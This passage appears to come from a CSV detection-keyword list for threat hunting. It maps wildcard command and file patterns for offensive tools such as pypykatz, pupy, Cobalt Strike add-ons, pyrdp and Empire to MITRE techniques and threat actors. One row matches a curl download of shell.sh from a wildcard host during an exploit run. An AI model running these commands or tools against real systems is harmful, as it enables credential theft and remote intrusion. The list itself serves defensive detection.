LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*pycobalt_timeout*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*pydictor*,offensive_tool_keyword,pydictor,pydictor A powerful and useful hacker dictionary builder for a brute-force attack,T1110 - T1111 - T1210 - T1558.004,TA0006 - TA0005,N/A,N/A,Credential Access,https://github.com/LandGrey/pydictor,1,0,N/A,N/A,10,2936,618,2023-01-11T13:02:06Z,2016-08-17T08:16:56Z -*pyexec -c *,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*pyexec --file*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*PyExec-main.*,offensive_tool_keyword,PyExec,This is a very simple privilege escalation technique from admin to System. 
This is the same technique PSExec uses.,T1134 - T1055 - T1548.002,TA0004 - TA0005 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/OlivierLaflamme/PyExec,1,1,N/A,9,1,10,6,2019-09-11T13:56:04Z,2019-09-11T13:54:15Z -*pygpoabuse * -hashes lm:* -gpo-id *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*pygpoabuse.py*,offensive_tool_keyword,pyGPOAbuse,python implementation of SharpGPOAbuse,T1566.001 - T1059.006 - T1112,TA0001 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/Hackndo/pyGPOAbuse,1,1,N/A,8,2,178,26,2023-01-20T19:02:09Z,2020-05-10T21:21:27Z -*pyherion.py*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*pyhon3 poc.py * curl http://*/shell.sh -o /tmp/shell.sh*,offensive_tool_keyword,POC,Automated PoC exploitation of CVE-2021-44521,T1548 - T1190,TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/QHpix/CVE-2021-44521,1,0,N/A,N/A,1,9,2,2022-02-24T12:04:40Z,2022-02-24T11:07:34Z -*pyinstaller *.py*,greyware_tool_keyword,pyinstaller,PyInstaller bundles a Python application and all its dependencies into a single package executable.,T1564.004 - T1027.001 - T1059.006,TA0002 - TA0003 - TA0005,N/A,N/A,Execution,https://www.pyinstaller.org/,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*pyinstaller.exe*,greyware_tool_keyword,pyinstaller,PyInstaller bundles a Python application and all its dependencies into a single package executable.,T1564.004 - T1027.001 - 
T1059.006,TA0002 - TA0003 - TA0005,N/A,N/A,Execution,https://www.pyinstaller.org/,1,1,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*pyinstaller/tarball*,greyware_tool_keyword,pyinstaller,PyInstaller bundles a Python application and all its dependencies into a single package executable.,T1564.004 - T1027.001 - T1059.006,TA0002 - TA0003 - TA0005,N/A,N/A,Execution,https://www.pyinstaller.org/,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*pyinstaller-script.py*,greyware_tool_keyword,pyinstaller,PyInstaller bundles a Python application and all its dependencies into a single package executable.,T1564.004 - T1027.001 - T1059.006,TA0002 - TA0003 - TA0005,N/A,N/A,Execution,https://www.pyinstaller.org/,1,1,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*pyLAPS.py --action get -d * -u * -p * --dc-ip *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*pyLAPS-main*,offensive_tool_keyword,pyLAPS,A simple way to read and write LAPS passwords from linux.,T1136.001 - T1112 - T1078.001,TA0002 - TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/p0dalirius/pyLAPS,1,1,N/A,9,1,50,9,2023-10-01T19:17:01Z,2021-10-05T18:35:21Z -*pyMalleableC2*,offensive_tool_keyword,cobaltstrike,Quick python utility I wrote to turn HTTP requests from burp suite into Cobalt Strike Malleable C2 profiles,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - 
T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CodeXTF2/Burp2Malleable,1,1,N/A,10,10,320,32,2023-04-06T15:24:12Z,2022-08-14T18:05:39Z -*pymultitor*,offensive_tool_keyword,pymultitor,Python Multi Threaded Tor Proxy. Did you ever want to be at two different places at the same time? When I asked myself this question. I actually started developing this solution in my mind. While performing penetration tests there are often problems caused by security devices that block the attacking IP,T1071.001 - T1071.004 - T1055.008,TA0002 - TA0003 - TA0008,N/A,N/A,Data Exfiltration,https://github.com/realgam3/pymultitor,1,0,N/A,N/A,6,543,116,2022-08-28T22:06:01Z,2013-09-28T15:55:49Z -*pypykatz *,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,1,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*pypykatz lsa minidump *,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -*pypykatz lsa minidump*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. 
PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/skelsec/pypykatz,1,0,N/A,10,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*pypykatz.commons*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*pypykatz.dpapi*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*pypykatz.exe*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,1,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*pypykatz.git*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,1,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*pypykatz.kerberos*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*pypykatz.lsadecryptor*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - 
T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*pypykatz.py*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,1,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*pypykatz.registry*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*pypykatz_handler.py*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*pypykatz_rekall.py*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,1,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*pypykatzClass*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,0,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*pypykatzfile*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,0,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*pypykatz-master.zip*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential 
Access,https://github.com/skelsec/pypykatz,1,1,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*pyrdp_output -*,offensive_tool_keyword,pyrdp,RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact,T1550.002 - T1059.006 - T1071.001,TA0002 - TA0010,N/A,N/A,Sniffing & Spoofing,https://github.com/GoSecure/pyrdp,1,1,can also be used by blueteam as a honeypot,10,10,1296,235,2023-07-28T14:33:09Z,2018-09-07T19:17:41Z -*pyrdp-clonecert.py*,offensive_tool_keyword,pyrdp,RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact,T1550.002 - T1059.006 - T1071.001,TA0002 - TA0010,N/A,N/A,Sniffing & Spoofing,https://github.com/GoSecure/pyrdp,1,1,can also be used by blueteam as a honeypot,10,10,1296,235,2023-07-28T14:33:09Z,2018-09-07T19:17:41Z -*pyrdp-convert.py*,offensive_tool_keyword,pyrdp,RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact,T1550.002 - T1059.006 - T1071.001,TA0002 - TA0010,N/A,N/A,Sniffing & Spoofing,https://github.com/GoSecure/pyrdp,1,1,can also be used by blueteam as a honeypot,10,10,1296,235,2023-07-28T14:33:09Z,2018-09-07T19:17:41Z -*pyrdp-mitm.py*,offensive_tool_keyword,pyrdp,RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact,T1550.002 - T1059.006 - T1071.001,TA0002 - TA0010,N/A,N/A,Sniffing & Spoofing,https://github.com/GoSecure/pyrdp,1,1,can also be used by blueteam as a honeypot,10,10,1296,235,2023-07-28T14:33:09Z,2018-09-07T19:17:41Z -*pyrdp-player.py*,offensive_tool_keyword,pyrdp,RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact,T1550.002 - T1059.006 - T1071.001,TA0002 - TA0010,N/A,N/A,Sniffing & Spoofing,https://github.com/GoSecure/pyrdp,1,1,can also be used by blueteam as a 
honeypot,10,10,1296,235,2023-07-28T14:33:09Z,2018-09-07T19:17:41Z -*pyrit -e * create_essid*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*pyrit -i *.txt import_passwords*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*pyrit -r *.pcap attack_db*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*pyrit -r *.pcap -b * -i *.txt attack_passthrough*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*pysoserial.py*,offensive_tool_keyword,pysoserial,Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,shell 
spawning,https://github.com/aStrowxyu/Pysoserial,1,1,N/A,9,1,9,1,2021-12-06T07:41:55Z,2021-11-16T01:55:31Z -*Pysoserial-main*,offensive_tool_keyword,pysoserial,Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,shell spawning,https://github.com/aStrowxyu/Pysoserial,1,1,N/A,9,1,9,1,2021-12-06T07:41:55Z,2021-11-16T01:55:31Z -*PySplunkWhisperer2*,offensive_tool_keyword,SplunkWhisperer2,Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations,T1068 - T1059.003 - T1071.001,TA0003 - TA0002 - TA0011,N/A,N/A,Lateral Movement - Privilege Escalation,https://github.com/cnotin/SplunkWhisperer2,1,1,N/A,9,3,239,53,2022-09-30T16:41:17Z,2019-02-24T18:05:51Z -*pystinger_for_darkshadow*,offensive_tool_keyword,cobaltstrike,Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. 
It can be directly used by metasploit-framework - viper- cobalt strike for session online.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/FunnyWolf/pystinger,1,1,N/A,10,10,1283,212,2021-09-29T13:13:43Z,2019-09-29T05:23:54Z -*python 3 st teamserver *,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,0,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*python -m http.server*,greyware_tool_keyword,http.server,setup a simple http server,T1021.005 - T1049,TA0009 - TA0002,N/A,N/A,Data Exfiltration,N/A,1,0,N/A,6,10,N/A,N/A,N/A,N/A -*python -m orbitaldump *,offensive_tool_keyword,orbitaldump,A simple multi-threaded distributed SSH brute-forcing tool written in Python.,T1110,TA0006,N/A,N/A,Exploitation tools,https://github.com/k4yt3x/orbitaldump,1,0,N/A,N/A,5,440,86,2022-10-30T23:40:57Z,2021-06-06T17:48:19Z -*python -m rarce *,offensive_tool_keyword,RaRCE,An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23,T1068 - T1203 - T1059.003,TA0001 - TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/ignis-sec/CVE-2023-38831-RaRCE,1,0,N/A,9,2,108,18,2023-08-27T22:17:56Z,2023-08-27T21:49:37Z -*python -m SimpleHTTPServer*,greyware_tool_keyword,simplehttpserver,quick web server in python,T1021.002 - T1059.006,TA0002 - TA0005,N/A,N/A,Data Exfiltration,https://docs.python.org/2/library/simplehttpserver.html,1,0,N/A,6,10,N/A,N/A,N/A,N/A -*python noPac.*,offensive_tool_keyword,POC,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0004 ,N/A,N/A,Exploitation tools,https://github.com/Ridter/noPac,1,0,N/A,N/A,7,643,112,2023-01-29T03:31:27Z,2021-12-13T10:28:12Z -*python rsf.py*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive 
tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*python scshell*,offensive_tool_keyword,cobaltstrike,Fileless lateral movement tool that relies on ChangeServiceConfigA to run command,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Mr-Un1k0d3r/SCShell,1,0,N/A,10,10,1241,228,2023-07-10T01:31:54Z,2019-11-13T23:39:27Z -*python st.py*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,0,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*python tinar.py*,offensive_tool_keyword,ThisIsNotRat,control windows computeur from telegram,T1098 - T1079 - T1105 - T1047 - T1059,TA0010 - TA0009 - TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/RealBey/ThisIsNotRat,1,0,N/A,9,10,49,18,2023-09-10T07:39:38Z,2023-09-07T14:07:32Z -*python* pachine.py*,offensive_tool_keyword,Pachine,Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation),T1068 - T1078 - T1059.006,TA0003 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/ly4k/Pachine,1,0,N/A,8,3,262,37,2022-01-13T12:35:19Z,2021-12-13T23:15:05Z -*python*charlotte.py*,offensive_tool_keyword,charlotte,c++ fully undetected shellcode launcher,T1055.012 - T1059.003 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/9emin1/charlotte,1,0,N/A,10,10,930,234,2021-06-11T04:44:18Z,2021-05-13T07:32:03Z -*python*http://*:6970/ConfigFileCacheList.txt*,offensive_tool_keyword,SeeYouCM-Thief,Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials,T1110.001 - T1005 - T1071.001,TA0001 - TA0011 - TA0005,N/A,N/A,Discovery,https://github.com/trustedsec/SeeYouCM-Thief,1,0,N/A,9,2,149,30,2023-05-11T01:04:36Z,2022-01-14T20:12:25Z -*python*'http://*SEP*:6970/*.cnf.xml*,offensive_tool_keyword,SeeYouCM-Thief,Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials,T1110.001 - T1005 - T1071.001,TA0001 - TA0011 - 
TA0005,N/A,N/A,Discovery,https://github.com/trustedsec/SeeYouCM-Thief,1,0,N/A,9,2,149,30,2023-05-11T01:04:36Z,2022-01-14T20:12:25Z -*python*https://*:8443/cucm-uds/users?name=*,offensive_tool_keyword,SeeYouCM-Thief,Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials,T1110.001 - T1005 - T1071.001,TA0001 - TA0011 - TA0005,N/A,N/A,Discovery,https://github.com/trustedsec/SeeYouCM-Thief,1,0,N/A,9,2,149,30,2023-05-11T01:04:36Z,2022-01-14T20:12:25Z -*python_modules/keyboard.zip*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1100,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
